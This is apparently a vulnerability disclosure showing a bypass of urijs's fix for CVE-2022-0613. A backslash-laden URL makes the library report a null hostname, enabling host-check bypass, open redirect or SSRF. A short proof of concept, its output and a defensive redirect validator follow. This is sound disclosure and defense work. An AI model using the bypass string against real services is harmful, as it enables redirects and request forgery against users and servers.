Bypass of https://huntr.dev/bounties/f53d5c42-c108-40b8-917d-9dad51535083/
urijs fixed CVE-2022-0613; however, an attacker can bypass the fix and still exploit the issue.
// PoC.js
var URI = require('urijs');
var url = new URI("https::\\\github.com/foo/bar");
console.log(url);
Output:
URI {
  _string: '',
  _parts: {
    protocol: 'https',
    username: null,
    password: null,
    hostname: null,
    urn: null,
    port: null,
    path: '/github.com/foo/bar',
    query: null,
    fragment: null,
    preventInvalidHostname: false,
    duplicateQueryParameters: false,
    escapeQuerySpace: true
  },
  _deferred_build: true
}
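urijs reports hostname: null and places github.com in the path, so code that relies on the parsed hostname never sees the host. This allows bypassing host-validation checks, open redirect, SSRF, etc., depending on how urijs is used.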
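
A fail-closed redirect-target check for code that consumes user-supplied URLs, added here as an example and not part of the original report or of urijs: it rejects backslashes before parsing, parses with the WHATWG `URL` class, and treats a missing hostname as a rejection. The function name, allowlist and sample inputs are constructed for illustration.

```javascript
// Added example: fail-closed validation of a redirect target.
// ALLOWED_HOSTS and checkRedirectTarget are hypothetical names.
const ALLOWED_HOSTS = new Set(['example.com', 'www.example.com']);

// Backslashes, whitespace and control characters are where URL parsers
// disagree, so they are rejected before any parsing happens.
const AMBIGUOUS = /[\\\s\u0000-\u001f\u007f]/;

function checkRedirectTarget(input, allowedHosts = ALLOWED_HOSTS) {
  if (typeof input !== 'string' || input.length === 0) {
    return { ok: false, reason: 'not a non-empty string' };
  }
  if (AMBIGUOUS.test(input)) {
    return { ok: false, reason: 'ambiguous character' };
  }
  let parsed;
  try {
    parsed = new URL(input); // WHATWG parser built into Node.js and browsers
  } catch (err) {
    return { ok: false, reason: 'unparseable' };
  }
  if (parsed.protocol !== 'https:') {
    return { ok: false, reason: 'scheme not allowed' };
  }
  if (parsed.username !== '' || parsed.password !== '') {
    return { ok: false, reason: 'userinfo not allowed' };
  }
  // A missing hostname is a rejection, never "nothing to check".
  if (!parsed.hostname || !allowedHosts.has(parsed.hostname)) {
    return { ok: false, reason: 'host not allowed' };
  }
  return { ok: true, url: parsed.href }; // use the normalized form downstream
}

// Constructed sample inputs; the first is the string from the PoC above.
const samples = [
  'https::\\\github.com/foo/bar',
  'https://example.com@github.com/',
  'https://github.com/foo/bar',
  'http://example.com/',
  'https://EXAMPLE.com/account',
];
for (const s of samples) {
  console.log(JSON.stringify(s), checkRedirectTarget(s));
}
```

Redirecting to the returned `url` value, not to the raw input, keeps the validated string and the string acted on identical.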